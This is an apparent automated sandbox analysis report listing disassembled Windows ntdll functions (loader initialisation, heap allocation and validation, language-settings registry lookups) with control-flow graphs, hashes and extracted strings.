                                                  Function 36D92DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 36d92df0-36d92dfc LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 7e148e907081296fdf1f20f1bb9e98a4d04e4381a8c9354387d7ca7b702aefe0
                                                  • Instruction ID: ecad89796e639348efc496d93f55834195e1a754f47d00b1fb6fe10d0ecc4517
                                                  • Opcode Fuzzy Hash: 7e148e907081296fdf1f20f1bb9e98a4d04e4381a8c9354387d7ca7b702aefe0
                                                  • Instruction Fuzzy Hash: AA90027174550413D21171988504B07000A47D0241F95C413A542462CD96568A56A121

                                                  Non-executed Functions

                                                  Function 36DF94E0 Relevance: 19.8, APIs: 8, Strings: 3, Instructions: 558timeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 553 36df94e0-36df9529 554 36df952b-36df9530 553->554 555 36df9578-36df9587 553->555 557 36df9534-36df953a 554->557 556 36df9589-36df958e 555->556 555->557 558 36df9d13-36df9d27 call 36d94c30 556->558 559 36df9695-36df96bd call 36d99020 557->559 560 36df9540-36df9564 call 36d99020 557->560 567 36df96bf-36df96da call 36df9d2a 559->567 568 36df96dc-36df9712 559->568 569 36df9566-36df9573 call 36e1972b 560->569 570 36df9593-36df9634 GetPEB call 36dfdc65 560->570 574 36df9714-36df9716 567->574 568->574 579 36df967d-36df9690 RtlDebugPrintTimes 569->579 580 36df9636-36df9644 570->580 581 36df9652-36df9667 570->581 574->558 578 36df971c-36df9731 RtlDebugPrintTimes 574->578 578->558 587 36df9737-36df973e 578->587 579->558 580->581 582 36df9646-36df964b 580->582 581->579 583 36df9669-36df966e 581->583 582->581 585 36df9673-36df9676 583->585 586 36df9670 583->586 585->579 586->585 587->558 589 36df9744-36df975f 587->589 590 36df9763-36df9774 call 36dfa808 589->590 593 36df977a-36df977c 590->593 594 36df9d11 590->594 593->558 595 36df9782-36df9789 593->595 594->558 596 36df978f-36df9794 595->596 597 36df98fc-36df9902 595->597 598 36df97bc 596->598 599 36df9796-36df979c 596->599 600 36df9a9c-36df9aa2 597->600 601 36df9908-36df9937 call 36d99020 597->601 603 36df97c0-36df9811 call 36d99020 RtlDebugPrintTimes 598->603 599->598 602 36df979e-36df97b2 599->602 605 36df9af4-36df9af9 600->605 606 36df9aa4-36df9aad 600->606 619 36df9939-36df9944 601->619 620 36df9970-36df9985 601->620 609 36df97b8-36df97ba 602->609 610 36df97b4-36df97b6 602->610 603->558 647 36df9817-36df981b 603->647 607 36df9aff-36df9b07 605->607 608 36df9ba8-36df9bb1 605->608 606->590 613 36df9ab3-36df9aef call 36d99020 606->613 615 36df9b09-36df9b0d 607->615 616 36df9b13-36df9b3d call 36df8513 607->616 608->590 618 36df9bb7-36df9bba 608->618 609->603 610->603 632 36df9ce9 613->632 615->608 615->616 644 36df9d08-36df9d0c 616->644 645 36df9b43-36df9b9e call 36d99020 RtlDebugPrintTimes 616->645 621 36df9c7d-36df9cb4 call 36d99020 618->621 622 36df9bc0-36df9c0a 618->622 623 36df994f-36df996e 619->623 624 36df9946-36df994d 619->624 626 36df9987-36df9989 620->626 627 36df9991-36df9998 620->627 655 36df9cbb-36df9cc2 621->655 656 36df9cb6 621->656 629 36df9c0c 622->629 630 36df9c11-36df9c1e 622->630 631 36df99d9-36df99f6 RtlDebugPrintTimes 623->631 624->623 633 36df998f 626->633 634 36df998b-36df998d 626->634 635 36df99bd-36df99bf 627->635 629->630 641 36df9c2a-36df9c2d 630->641 642 36df9c20-36df9c23 630->642 631->558 659 36df99fc-36df9a1f call 36d99020 631->659 643 36df9ced 632->643 633->627 634->627 639 36df999a-36df99a4 635->639 640 36df99c1-36df99d7 635->640 652 36df99ad 639->652 653 36df99a6 639->653 640->631 650 36df9c2f-36df9c32 641->650 651 36df9c39-36df9c7b 641->651 642->641 649 36df9cf1-36df9d06 RtlDebugPrintTimes 643->649 644->590 645->558 686 36df9ba4 645->686 657 36df981d-36df9825 647->657 658 36df986b-36df9880 647->658 649->558 649->644 650->651 651->649 663 36df99af-36df99b1 652->663 653->640 661 36df99a8-36df99ab 653->661 664 36df9ccd 655->664 665 36df9cc4-36df9ccb 655->665 656->655 666 36df9827-36df9850 call 36df8513 657->666 667 36df9852-36df9869 657->667 660 36df9886-36df9894 658->660 683 36df9a3d-36df9a58 659->683 684 36df9a21-36df9a3b 659->684 670 36df9898-36df98ef call 36d99020 RtlDebugPrintTimes 660->670 661->663 672 36df99bb 663->672 673 36df99b3-36df99b5 663->673 674 36df9cd1-36df9cd7 664->674 665->674 666->670 667->660 670->558 689 36df98f5-36df98f7 670->689 672->635 673->672 679 36df99b7-36df99b9 673->679 680 36df9cde-36df9ce4 674->680 681 36df9cd9-36df9cdc 674->681 679->635 680->643 682 36df9ce6 680->682 681->632 682->632 687 36df9a5d-36df9a8b RtlDebugPrintTimes 683->687 684->687 686->608 687->558 691 36df9a91-36df9a97 687->691 689->644 691->618
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: $ $0
                                                  • API String ID: 3446177414-3352262554
                                                  • Opcode ID: 6b50d9a61c30c5d7bb4cf16196ccd75913ed126b2b7c87e60e44723ae2e920de
                                                  • Instruction ID: 3d68648b6187e90e4617fae9607241a421edbd5a54c081dbf7d8e29714648ede
                                                  • Opcode Fuzzy Hash: 6b50d9a61c30c5d7bb4cf16196ccd75913ed126b2b7c87e60e44723ae2e920de
                                                  • Instruction Fuzzy Hash: E13235B1A183818FE310CF69C880B5BBBE5BF88344F15492EF59A8B350D776D949CB52
                                                  Function 36E00274 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 348timeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1296 36e00274-36e00296 call 36da7e54 1299 36e002b5-36e002cd call 36d476b2 1296->1299 1300 36e00298-36e002b0 RtlDebugPrintTimes 1296->1300 1305 36e002d3-36e002e9 1299->1305 1306 36e006f7 1299->1306 1304 36e00751-36e00760 1300->1304 1307 36e002f0-36e002f2 1305->1307 1308 36e002eb-36e002ee 1305->1308 1309 36e006fa-36e0074e call 36e00766 1306->1309 1310 36e002f3-36e0030a 1307->1310 1308->1310 1309->1304 1312 36e00310-36e00313 1310->1312 1313 36e006b1-36e006ba GetPEB 1310->1313 1312->1313 1315 36e00319-36e00322 1312->1315 1317 36e006d9-36e006de call 36d4b970 1313->1317 1318 36e006bc-36e006d7 GetPEB call 36d4b970 1313->1318 1320 36e00324-36e0033b call 36d5ffb0 1315->1320 1321 36e0033e-36e00351 call 36e00cb5 1315->1321 1323 36e006e3-36e006f4 call 36d4b970 1317->1323 1318->1323 1320->1321 1331 36e00353-36e0035a 1321->1331 1332 36e0035c-36e00370 call 36d4758f 1321->1332 1323->1306 1331->1332 1335 36e005a2-36e005a7 1332->1335 1336 36e00376-36e00382 GetPEB 1332->1336 1335->1309 1339 36e005ad-36e005b9 GetPEB 1335->1339 1337 36e003f0-36e003fb 1336->1337 1338 36e00384-36e00387 1336->1338 1344 36e00401-36e00408 1337->1344 1345 36e004e8-36e004fa call 36d627f0 1337->1345 1340 36e003a6-36e003ab call 36d4b970 1338->1340 1341 36e00389-36e003a4 GetPEB call 36d4b970 1338->1341 1342 36e00627-36e00632 1339->1342 1343 36e005bb-36e005be 1339->1343 1356 36e003b0-36e003d1 call 36d4b970 GetPEB 1340->1356 1341->1356 1342->1309 1352 36e00638-36e00643 1342->1352 1347 36e005c0-36e005db GetPEB call 36d4b970 1343->1347 1348 36e005dd-36e005e2 call 36d4b970 1343->1348 1344->1345 1351 36e0040e-36e00417 1344->1351 1367 36e00590-36e0059d call 36e011a4 call 36e00cb5 1345->1367 1368 36e00500-36e00507 1345->1368 1366 36e005e7-36e005fb call 36d4b970 1347->1366 1348->1366 1359 36e00438-36e0043c 1351->1359 1360 36e00419-36e00429 1351->1360 1352->1309 1353 36e00649-36e00654 1352->1353 1353->1309 1361 36e0065a-36e00663 GetPEB 1353->1361 1356->1345 1386 36e003d7-36e003eb 1356->1386 1362 36e0044e-36e00454 1359->1362 1363 36e0043e-36e0044c call 36d83bc9 1359->1363 1360->1359 1369 36e0042b-36e00435 call 36e0dac6 1360->1369 1370 36e00682-36e00687 call 36d4b970 1361->1370 1371 36e00665-36e00680 GetPEB call 36d4b970 1361->1371 1373 36e00457-36e00460 1362->1373 1363->1373 1398 36e005fe-36e00608 GetPEB 1366->1398 1367->1335 1376 36e00512-36e0051a 1368->1376 1377 36e00509-36e00510 1368->1377 1369->1359 1395 36e0068c-36e006ac call 36df86ba call 36d4b970 1370->1395 1371->1395 1384 36e00472-36e00475 1373->1384 1385 36e00462-36e00470 1373->1385 1388 36e00538-36e0053c 1376->1388 1389 36e0051c-36e0052c 1376->1389 1377->1376 1396 36e004e5 1384->1396 1397 36e00477-36e0047e 1384->1397 1385->1384 1386->1345 1392 36e0056c-36e00572 1388->1392 1393 36e0053e-36e00551 call 36d83bc9 1388->1393 1389->1388 1399 36e0052e-36e00533 call 36e0dac6 1389->1399 1404 36e00575-36e0057c 1392->1404 1410 36e00563 1393->1410 1411 36e00553-36e00561 call 36d7fe99 1393->1411 1395->1398 1396->1345 1397->1396 1403 36e00480-36e0048b 1397->1403 1398->1309 1405 36e0060e-36e00622 1398->1405 1399->1388 1403->1396 1408 36e0048d-36e00496 GetPEB 1403->1408 1404->1367 1409 36e0057e-36e0058e 1404->1409 1405->1309 1413 36e004b5-36e004ba call 36d4b970 1408->1413 1414 36e00498-36e004b3 GetPEB call 36d4b970 1408->1414 1409->1367 1417 36e00566-36e0056a 1410->1417 1411->1417 1420 36e004bf-36e004dd call 36df86ba call 36d4b970 1413->1420 1414->1420 1417->1404 1420->1396
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                  • API String ID: 3446177414-1700792311
                                                  • Opcode ID: 9f184e7b9f826e91f648a6b4341e50ce7c76c5b93d1802d6aaab2d26958699f1
                                                  • Instruction ID: eb1817aef793023c6bd9474fe555463318ab24ff2bc5e9abf7865ce54e756b00
                                                  • Opcode Fuzzy Hash: 9f184e7b9f826e91f648a6b4341e50ce7c76c5b93d1802d6aaab2d26958699f1
                                                  • Instruction Fuzzy Hash: 52D14579910680EFDB12DFB6C840AADBBF2FF19309F448049E444AB651CB34D98ACF65
                                                  Function 36DFF525 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 231timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                  • API String ID: 3446177414-1745908468
                                                  • Opcode ID: 778d01c5b67104364772d99d2205849f42a2423cc52d47114c88fbad2bff3c02
                                                  • Instruction ID: f0bd6f0ee50cd04f7f8fe09effe04abfa5bb245ce3d47a1329c54993284c4992
                                                  • Opcode Fuzzy Hash: 778d01c5b67104364772d99d2205849f42a2423cc52d47114c88fbad2bff3c02
                                                  • Instruction Fuzzy Hash: 0F912276920740EFDB02CFBAC840A9DBBF2FF19714F568059E444AF6A1CB369845CB61
                                                  Function 36E012ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                  • API String ID: 0-3591852110
                                                  • Opcode ID: d30a97d38b7e579687bdfce599dfd35417f2377c8eb40dfd5edbc726cb12caa9
                                                  • Instruction ID: 30f2c9ef4b08f09e575d407cdeaedbec6d48f1bc9504fc7aafca8e2538c698e0
                                                  • Opcode Fuzzy Hash: d30a97d38b7e579687bdfce599dfd35417f2377c8eb40dfd5edbc726cb12caa9
                                                  • Instruction Fuzzy Hash: 6912BE78A00741EFE7168FA6C440BA6BBF5FF09318F548459E4858F691DB34E889CFA1
                                                  Function 36D4D34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                  • API String ID: 0-3532704233
                                                  • Opcode ID: 76df26a67148a4f2503989d9541a9a770d22014d63023353d9079e4c1cd715cd
                                                  • Instruction ID: 22f216fed25ee81f749fb7e91f8d27eb2df0d61b11253dcf7132ced5e1daa051
                                                  • Opcode Fuzzy Hash: 76df26a67148a4f2503989d9541a9a770d22014d63023353d9079e4c1cd715cd
                                                  • Instruction Fuzzy Hash: E8B1A0769183559FD712DF24C840A5FB7E8AF88758F42492EF888D7244DB70DD48CBA2
                                                  Function 36D61070 Relevance: 11.4, APIs: 2, Strings: 4, Instructions: 940timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                  • API String ID: 3446177414-3570731704
                                                  • Opcode ID: 3299569b2b81dc2ace57465057dcd3c26d396e4215bae9e3486c4164c0804ad0
                                                  • Instruction ID: c39602bbe9d4dba9a4b62395b6240ad7178be7da38f88851b6d0a7877c1b9dde
                                                  • Opcode Fuzzy Hash: 3299569b2b81dc2ace57465057dcd3c26d396e4215bae9e3486c4164c0804ad0
                                                  • Instruction Fuzzy Hash: FC925775E11328CFEB20CF2ACC40B99BBB5AF45348F5181EAD989A7250DB309E85CF51
                                                  Function 36D7D7B0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RtlDebugPrintTimes.NTDLL ref: 36D7D959
                                                    • Part of subcall function 36D54859: RtlDebugPrintTimes.NTDLL ref: 36D548F7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 3446177414-1975516107
                                                  • Opcode ID: f1acb97a1adb99957046a1e8bf7945dda3b020a51af8e1574ce33f9dc3c77887
                                                  • Instruction ID: d365f9d5b22275146824bdb50a6e48ee353bba28bb624f9c96eded083172c969
                                                  • Opcode Fuzzy Hash: f1acb97a1adb99957046a1e8bf7945dda3b020a51af8e1574ce33f9dc3c77887
                                                  • Instruction Fuzzy Hash: A751FEB5E04345DFEB05CFA5C88478EBBB2BF48308F644059C511BB289CB74A84ACF92
                                                  Function 36DE9179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                  • API String ID: 0-3063724069
                                                  • Opcode ID: 892b8c87e2aee6db2c31d901f251c3d056733b54389ccd96ccc8cf1025460705
                                                  • Instruction ID: 6e1a1a51a48fab261c4d4f209a193705a9373dd4bdd49e2f4d512a21d1f979be
                                                  • Opcode Fuzzy Hash: 892b8c87e2aee6db2c31d901f251c3d056733b54389ccd96ccc8cf1025460705
                                                  • Instruction Fuzzy Hash: F3D1C2B2806351AFE721CB518840BAFB7E8AF84754F41092EF9C5AB250D774C948CBE3
                                                  Function 36D4D08D Relevance: 10.2, Strings: 8, Instructions: 249COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • @, xrefs: 36D4D313
                                                  • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 36D4D262
                                                  • Control Panel\Desktop\LanguageConfiguration, xrefs: 36D4D196
                                                  • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 36D4D146
                                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 36D4D2C3
                                                  • @, xrefs: 36D4D0FD
                                                  • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 36D4D0CF
                                                  • @, xrefs: 36D4D2AF
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                  • API String ID: 0-1356375266
                                                  • Opcode ID: b02c22bd155af519eec9e81c8be9c49968de42fbf8dc236ae633fd8ea26610a6
                                                  • Instruction ID: 2f504f13be86f772189380ab97a21c77cf16cd6bf8bb8097a912432c86c2838c
                                                  • Opcode Fuzzy Hash: b02c22bd155af519eec9e81c8be9c49968de42fbf8dc236ae633fd8ea26610a6
                                                  • Instruction Fuzzy Hash: 1EA17E719083459FE322DF21C880B9BB7E8BB84759F51492EF98896244DB74D908CFA3
                                                  Function 36D4F172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                  • API String ID: 0-523794902
                                                  • Opcode ID: ae82a968b3ff635deaba54b118ff5463c39df1c48729f10f5e1220ac02f6fcc4
                                                  • Instruction ID: 5b1edf88453210d7c07dc6ee254f2bd94e12472dd0a04155dec00352d584455a
                                                  • Opcode Fuzzy Hash: ae82a968b3ff635deaba54b118ff5463c39df1c48729f10f5e1220ac02f6fcc4
                                                  • Instruction Fuzzy Hash: BC42CC75A083819FE312DF29C884A2ABBE5FF88348F54496DE485CB261DF34DD45CB62
                                                  Function 36D6B1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                  • API String ID: 0-122214566
                                                  • Opcode ID: fddb577091bafb7edeacce888d2c672bf963b4b7f1ed6811ee1be2df18300998
                                                  • Instruction ID: ea042178f9ff56a33ae560652e4bb860eb714e470ff111dfd5c712ba3b97d5c9
                                                  • Opcode Fuzzy Hash: fddb577091bafb7edeacce888d2c672bf963b4b7f1ed6811ee1be2df18300998
                                                  • Instruction Fuzzy Hash: 58C11771E00315ABEB248F67CC90BBEB7B5AF4930CF944069E846EB290DB74C955C7A1
                                                  Function 36D60770 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                  • API String ID: 0-4253913091
                                                  • Opcode ID: 9f71cf1dbb95aa0528a2a7f154b6226fcc60bf06c353361ae839a3f446c615c4
                                                  • Instruction ID: 74c37dc644570283371ccb7077d96a06faf612faee9ad902cc0e3ca62df5642b
                                                  • Opcode Fuzzy Hash: 9f71cf1dbb95aa0528a2a7f154b6226fcc60bf06c353361ae839a3f446c615c4
                                                  • Instruction Fuzzy Hash: 33F1EC74A00605DFEB15CF6AD980F6AB7B6FF44348F6481A9E4469B384DB30E981CF91
                                                  Function 36D7F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • RTL: Re-Waiting, xrefs: 36DC031E
                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 36DC02E7
                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 36DC02BD
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
